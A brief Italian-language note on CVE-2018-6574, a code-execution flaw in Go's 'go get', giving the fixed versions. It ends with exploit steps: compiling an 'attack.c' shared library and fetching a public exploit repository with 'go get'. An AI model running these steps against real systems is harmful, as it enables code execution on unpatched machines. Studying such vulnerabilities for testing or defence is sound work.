
CVE-2018-6574 questa vulnerabilità interessa il comando go get di Golang e consente a un utente malintenzionato di ottenere l'esecuzione di codice su un sistema installando una libreria maliziosa, questa vulnerabilità è stata risolta in Go 1.8. 7, 1.9. 4 e 1.10rc2. Golang compilerà estensioni native.
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit